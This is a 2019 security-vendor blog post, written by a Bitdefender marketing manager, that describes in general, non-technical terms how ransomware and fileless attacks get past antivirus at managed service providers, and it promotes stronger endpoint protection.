How AV and Endpoint Security Are Failing MSPs in Defending against Attacks

Cristian Iordache

March 20, 2019

How AV and Endpoint Security Are Failing MSPs in Defending against Attacks

Recent attacks on MSPs have confirmed once again that both managed service providers and customers are increasingly targeted by cybercriminals, and the attacks often succeed.

While a lack of patching and additional controls such as MFA can leave the porch door open for attackers, inefficient AV and endpoint protection allow criminals to walk in the front door unhindered. This was apparently the case for MSPs that had not patched a known vulnerability and found their customers infected with GandCrab ransomware. In most of these cases, the AV did not detect or stop the attacks, and it was not possible to restore files from unencrypted copies.

Although the discussion often gravitates towards extra measures MSPs can take, it’s worth seriously considering the efficacy of each layer in the security stack, and not just the number of layers. While no AV can stop all attacks, a product with high efficacy in stopping even unknown malware can turn a potentially crippling ransomware attack into a report saying the attack was thwarted.

 How do ransomware and other attacks bypass antimalware protection?


  • They use application exploits to gain full control over systems

By taking advantage of unpatched vulnerabilities in the code of legitimate trusted applications, attackers can run their own scripts without the antimalware being able to identify the malicious payload. Once they gain control, they can perfect their attack and leverage remote scripting, deactivating protection or continuing to tweak ransomware or other payloads until they are not detected. Even if the attacker has full control over the system, an AV detection could warn the MSP of the breach before the objective is completed.


  • They target MSPs directly to gain remote access to customers

MSPs make good targets for attackers, as compromising MSP remote IT support software systems practically grants access to computers of hundreds of customers. The lack of a mature security management process and efficient layered security means attackers’ efforts are low and their rewards are high.


  • They constantly customize ransomware scripts and behavior and try to deactivate protection

Malware files and behaviors are tweaked constantly, and most AV products can’t recognize modified versions. The encryption process is allowed to start. Even if allowed to run at first, though, ransomware can be stopped when malicious behavior is recognized. Here again, because of the altered behaviors, most AV solutions can’t keep up so they don't detect and stop the processes.


  • They use script-based attacks

By leveraging legitimate scripting tools such as PowerShell, attackers bypass malware scanning because no file is written on disk. In this case, the whole attack takes place in memory and most AV tools are not able to scan and identify malicious remote commands.

With attacks intensifying and customers being breached, MSPs should reconsider their security, look at independent reviews and opt for tools that have proven superior efficacy and include advanced layers of protection such as anti-exploit and protection against fileless attacks.


Watch the on-demand webinar to learn how you can significantly reduce cyber-security risks for yourself and your customers.



Cristian Iordache

Cristian Iordache is a CISSP and Principal Product Marketing Manager at Bitdefender and has spent more than a decade helping organizations address cybersecurity challenges. He loves to highlight security tips and technologies that are proven to improve security operations efficiency and effectiveness against the most elusive attacks.

View all posts

You might also like